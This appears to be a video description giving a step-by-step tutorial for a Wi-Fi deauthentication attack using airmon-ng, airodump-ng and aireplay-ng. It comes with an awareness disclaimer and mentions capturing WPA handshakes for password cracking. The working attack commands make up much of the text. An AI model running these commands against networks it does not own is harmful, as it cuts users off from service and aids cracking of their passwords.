In this video, we will learn all about the De-authentication Attack. In simple words, what we can do by doing this deauth attack is, we can actually prevent any device from connecting to a Wi-Fi and accessing Internet. We can actually do this attack on any Wi-Fi network within our range, even though we are not a part of that network.

DISCLAIMER : The main intention of making this video is let you all know about this vulneribility in your Wi-Fi network, and how easy it is for others to perform this attack on your network and capture the intitial handshake. Performing this attack on any network without the permissions from the owner is an illegal activity. I am not responsible for anything you do.
Steps to perform a Deauth attack (Only try this on your own Wi-Fi network)
1. Enable monitor mode in Kali linux by typing these commands
airmon-ng check kill
airmon-ng start wlan0
2. Start capture by typing in,
airodump-ng start *monitor mode interface*
3. Once the target wi-fi appears in the list, stop the scan and type in the following command to scan the target network.
airodump-ng --channel *channel number of target network* --bssid *bssid of target network* *monitor mode interface*
4. Once the target client device appears in the list, type this command to send deauth requests to the target device
aireplay-ng -0 *number of deauth requests* -a *bssid of router* -c *MAC of target device* *monitor mode interface*
That's it!
One of the major use of doing a deauthentication attack is to capture the WPA handshake in-order to crack the password of a Wi-Fi network using techniques like brute force or dictionary attack.
Some of the Enterprise networks might be secure to this attack by using some advanced techniques!
